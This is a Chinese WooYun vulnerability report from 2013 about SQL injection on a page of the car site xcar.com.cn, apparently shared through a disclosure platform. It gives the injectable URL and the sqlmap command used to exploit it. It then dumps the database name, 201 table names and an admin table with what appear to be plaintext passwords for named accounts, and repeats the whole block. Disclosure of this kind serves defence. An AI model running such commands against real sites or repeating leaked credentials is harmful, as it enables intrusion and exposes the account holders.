漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-041629
漏洞标题:爱卡汽车网SQL注入漏洞一枚
相关厂商:爱卡汽车网
漏洞作者: sql
提交时间:2013-11-01 11:19
修复时间:2013-12-16 11:20
公开时间:2013-12-16 11:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-01: 细节已通知厂商并且等待厂商处理中
2013-11-01: 厂商已经确认,细节仅向厂商公开
2013-11-11: 细节向核心白帽子及相关领域专家公开
2013-11-21: 细节向普通白帽子公开
2013-12-01: 细节向实习白帽子公开
2013-12-16: 细节向公众公开
简要描述:
爱卡汽车网SQL注入漏洞一枚
详细说明:
猪肉点:
http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871
sqlmap.py -u "http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871" --current-db
数据库名:xcardb2
表名:
[201 tables]
+----------------------------------------+
| ad_tf |
| ad_time |
| ad_type |
| ad_value |
| ad_wz |
| adb_blc |
| adb_car |
| adb_carer |
| adb_chewang |
| adb_sh |
| adb_toyota |
| adb_vote |
| admin_user |
| ads_acls |
| ads_adclicks |
| ads_adstats |
| ads_adviews |
| ads_affiliates |
| ads_banners |
| ads_cache |
| ads_clients |
| ads_config |
| ads_images |
| ads_jyk |
| ads_session |
| ads_targetstats |
| ads_userlog |
| ads_zones |
| article_text |
| article_text_copy |
| article_tpl |
| article_type |
| article_value |
| article_zt |
| auto_pic |
| automarket_activity |
| automarket_amarket |
| automarket_bidden |
| automarket_finance |
| automarket_group |
| automarket_index |
| automarket_level |
| automarket_obidden |
| automarket_quote |
| automarket_sesslib |
| automarket_user |
| bbs_avg_forums |
| bbs_forums |
| bbs_jiafen_log |
| bm |
| car_test |
| cardb_brand |
| cardb_car |
| cardb_color |
| cardb_innercolor |
| cardb_pic |
| cardb_series |
| cardb_type |
| chat_ad |
| chat_cs |
| chat_gg |
| chat_jb |
| comment_blacklist |
| comment_main |
| comment_reply |
| comment_sub |
| days_info |
| days_route_info |
| days_site_info |
| dc_gmi |
| dc_gr |
| dc_type |
| dc_value |
| dc_wt |
| dc_xx |
| diaocha_user1 |
| diaocha_user2 |
| diaocha_user3 |
| diaocha_user4 |
| diaocha_user5 |
| diaocha_user6 |
| edm_url |
| expert_online |
| fks_faxing_game |
| gd_url |
| huifu |
| hy_city |
| hy_zl |
| ir_dc_qc |
| ir_xcar |
| junjie18_expert_online |
| lan_gg |
| live_chat |
| log_time |
| mycon_login |
| news_sina |
| news_stardy |
| news_temp |
| news_url |
| news_wenxin |
| news_xinhua |
| page_hit_info |
| peugeot_expert_online |
| pic_url |
| prius_expert_online |
| ren_url |
| road_book |
| road_city |
| road_vote |
| route_info |
| shuanglong |
| stra |
| survey_count |
| survey_h3 |
| tid_map_newsid |
| time_zt |
| tj_dc |
| topic_5year_answer |
| topic_5year_member |
| topic_5year_question |
| topic_5year_sign |
| topic_5year_star |
| topic_5year_tiger |
| topic_5year_times |
| topic_pic_bxjg |
| tracert_switch |
| type_url |
| x_news_comment |
| xcar_Complaints_list |
| xcar_adb_service_org_add |
| xcar_adb_service_org_details |
| xcar_adb_service_org_users |
| xcar_adb_succor_detail |
| xcar_adb_succor_id |
| xcar_aoyun |
| xcar_area_activities |
| xcar_area_activities_person |
| xcar_bbs2cardb |
| xcar_bbs_avg_forum |
| xcar_bbs_digest |
| xcar_bbs_digestclass |
| xcar_bbs_hot |
| xcar_bbs_hot070117 |
| xcar_bbs_hot_20060327 |
| xcar_bbs_hot_20090622 |
| xcar_bbs_hot_allmax |
| xcar_bbs_hot_allmax_copy |
| xcar_bbs_hot_copy |
| xcar_bbs_hot_fidhourmax_20051125222400 |
| xcar_bbs_hot_forummax |
| xcar_bbs_hot_forummax_copy |
| xcar_bbs_hot_temp |
| xcar_bbs_hot_temp_test |
| xcar_blog_admin |
| xcar_blog_article_comment |
| xcar_blog_article_list |
| xcar_blog_message_list |
| xcar_blog_user_list |
| xcar_bx_post |
| xcar_bx_user |
| xcar_car_pull_usr |
| xcar_car_url |
| xcar_chezhan_admin |
| xcar_chezhan_result |
| xcar_comment |
| xcar_dc |
| xcar_examin |
| xcar_examin_pic |
| xcar_machao_tmp |
| xcar_manage_baiban |
| xcar_member_hot |
| xcar_photography |
| xcar_pinche |
| xcar_play_hp |
| xcar_praise |
| xcar_praise_log |
| xcar_pull |
| xcar_pull_car |
| xcar_question |
| xcar_reseach_question_info |
| xcar_research_person_info |
| xcar_sale_buyer |
| xcar_sale_pra |
| xcar_small_message |
| xcar_small_message2011 |
| xcar_survey_diantong |
| xcar_topic_login_user |
| xcar_topic_per_info |
| xcar_topic_relation |
| xcar_topic_users_jilu |
| xcar_topic_vote_result |
| xcar_topic_vote_value |
| xcar_user |
| xcar_user_banned |
| xcar_user_shielding |
| xcar_vote_log |
| xcar_xfdc_question_info |
| xcar_zoo_post |
| xtv_live_info |
| youhao |
| yq_url |
+----------------------------------------+
管理员表:
+-------+---------+---------------+-------------+
| id | groupid | pass | name |
+-------+---------+---------------+-------------+
| 1 | 9 | g_i_c_x | ggicc |
| 8 | NULL | hao_1zhi | haozhi |
| 3 | 2 | xiaomin_abis | xiaomin_bak |
| 94815 | NULL | xcar_88508031 | jersonzhow |
| 9 | NULL | kanshale_xzzz | ????? |
| 94816 | 1 | zzzzzz | ?????_bak |
| 23198 | 0 | xcar_8850 | ?????????? |
| 2 | 3 | user_abis | user |
| 5 | 3 | byf_fyb | byf |
| 94817 | 3 | wuwei_10 | wuwei_bak |
+-------+---------+---------------+-------------+
漏洞证明:
猪肉点:
http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871
sqlmap.py -u "http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871" --current-db
数据库名:xcardb2
表名:
[201 tables]
+----------------------------------------+
| ad_tf |
| ad_time |
| ad_type |
| ad_value |
| ad_wz |
| adb_blc |
| adb_car |
| adb_carer |
| adb_chewang |
| adb_sh |
| adb_toyota |
| adb_vote |
| admin_user |
| ads_acls |
| ads_adclicks |
| ads_adstats |
| ads_adviews |
| ads_affiliates |
| ads_banners |
| ads_cache |
| ads_clients |
| ads_config |
| ads_images |
| ads_jyk |
| ads_session |
| ads_targetstats |
| ads_userlog |
| ads_zones |
| article_text |
| article_text_copy |
| article_tpl |
| article_type |
| article_value |
| article_zt |
| auto_pic |
| automarket_activity |
| automarket_amarket |
| automarket_bidden |
| automarket_finance |
| automarket_group |
| automarket_index |
| automarket_level |
| automarket_obidden |
| automarket_quote |
| automarket_sesslib |
| automarket_user |
| bbs_avg_forums |
| bbs_forums |
| bbs_jiafen_log |
| bm |
| car_test |
| cardb_brand |
| cardb_car |
| cardb_color |
| cardb_innercolor |
| cardb_pic |
| cardb_series |
| cardb_type |
| chat_ad |
| chat_cs |
| chat_gg |
| chat_jb |
| comment_blacklist |
| comment_main |
| comment_reply |
| comment_sub |
| days_info |
| days_route_info |
| days_site_info |
| dc_gmi |
| dc_gr |
| dc_type |
| dc_value |
| dc_wt |
| dc_xx |
| diaocha_user1 |
| diaocha_user2 |
| diaocha_user3 |
| diaocha_user4 |
| diaocha_user5 |
| diaocha_user6 |
| edm_url |
| expert_online |
| fks_faxing_game |
| gd_url |
| huifu |
| hy_city |
| hy_zl |
| ir_dc_qc |
| ir_xcar |
| junjie18_expert_online |
| lan_gg |
| live_chat |
| log_time |
| mycon_login |
| news_sina |
| news_stardy |
| news_temp |
| news_url |
| news_wenxin |
| news_xinhua |
| page_hit_info |
| peugeot_expert_online |
| pic_url |
| prius_expert_online |
| ren_url |
| road_book |
| road_city |
| road_vote |
| route_info |
| shuanglong |
| stra |
| survey_count |
| survey_h3 |
| tid_map_newsid |
| time_zt |
| tj_dc |
| topic_5year_answer |
| topic_5year_member |
| topic_5year_question |
| topic_5year_sign |
| topic_5year_star |
| topic_5year_tiger |
| topic_5year_times |
| topic_pic_bxjg |
| tracert_switch |
| type_url |
| x_news_comment |
| xcar_Complaints_list |
| xcar_adb_service_org_add |
| xcar_adb_service_org_details |
| xcar_adb_service_org_users |
| xcar_adb_succor_detail |
| xcar_adb_succor_id |
| xcar_aoyun |
| xcar_area_activities |
| xcar_area_activities_person |
| xcar_bbs2cardb |
| xcar_bbs_avg_forum |
| xcar_bbs_digest |
| xcar_bbs_digestclass |
| xcar_bbs_hot |
| xcar_bbs_hot070117 |
| xcar_bbs_hot_20060327 |
| xcar_bbs_hot_20090622 |
| xcar_bbs_hot_allmax |
| xcar_bbs_hot_allmax_copy |
| xcar_bbs_hot_copy |
| xcar_bbs_hot_fidhourmax_20051125222400 |
| xcar_bbs_hot_forummax |
| xcar_bbs_hot_forummax_copy |
| xcar_bbs_hot_temp |
| xcar_bbs_hot_temp_test |
| xcar_blog_admin |
| xcar_blog_article_comment |
| xcar_blog_article_list |
| xcar_blog_message_list |
| xcar_blog_user_list |
| xcar_bx_post |
| xcar_bx_user |
| xcar_car_pull_usr |
| xcar_car_url |
| xcar_chezhan_admin |
| xcar_chezhan_result |
| xcar_comment |
| xcar_dc |
| xcar_examin |
| xcar_examin_pic |
| xcar_machao_tmp |
| xcar_manage_baiban |
| xcar_member_hot |
| xcar_photography |
| xcar_pinche |
| xcar_play_hp |
| xcar_praise |
| xcar_praise_log |
| xcar_pull |
| xcar_pull_car |
| xcar_question |
| xcar_reseach_question_info |
| xcar_research_person_info |
| xcar_sale_buyer |
| xcar_sale_pra |
| xcar_small_message |
| xcar_small_message2011 |
| xcar_survey_diantong |
| xcar_topic_login_user |
| xcar_topic_per_info |
| xcar_topic_relation |
| xcar_topic_users_jilu |
| xcar_topic_vote_result |
| xcar_topic_vote_value |
| xcar_user |
| xcar_user_banned |
| xcar_user_shielding |
| xcar_vote_log |
| xcar_xfdc_question_info |
| xcar_zoo_post |
| xtv_live_info |
| youhao |
| yq_url |
+----------------------------------------+
管理员表:
+-------+---------+---------------+-------------+
| id | groupid | pass | name |
+-------+---------+---------------+-------------+
| 1 | 9 | g_i_c_x | ggicc |
| 8 | NULL | hao_1zhi | haozhi |
| 3 | 2 | xiaomin_abis | xiaomin_bak |
| 94815 | NULL | xcar_88508031 | jersonzhow |
| 9 | NULL | kanshale_xzzz | ????? |
| 94816 | 1 | zzzzzz | ?????_bak |
| 23198 | 0 | xcar_8850 | ?????????? |
| 2 | 3 | user_abis | user |
| 5 | 3 | byf_fyb | byf |
| 94817 | 3 | wuwei_10 | wuwei_bak |
+-------+---------+---------------+-------------+
修复方案:
过滤
版权声明:转载请注明来源 sql@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2013-11-01 15:57
厂商回复:
感谢白帽子@sql的提供,谢谢,我们会抓紧处理!
最新状态:
暂无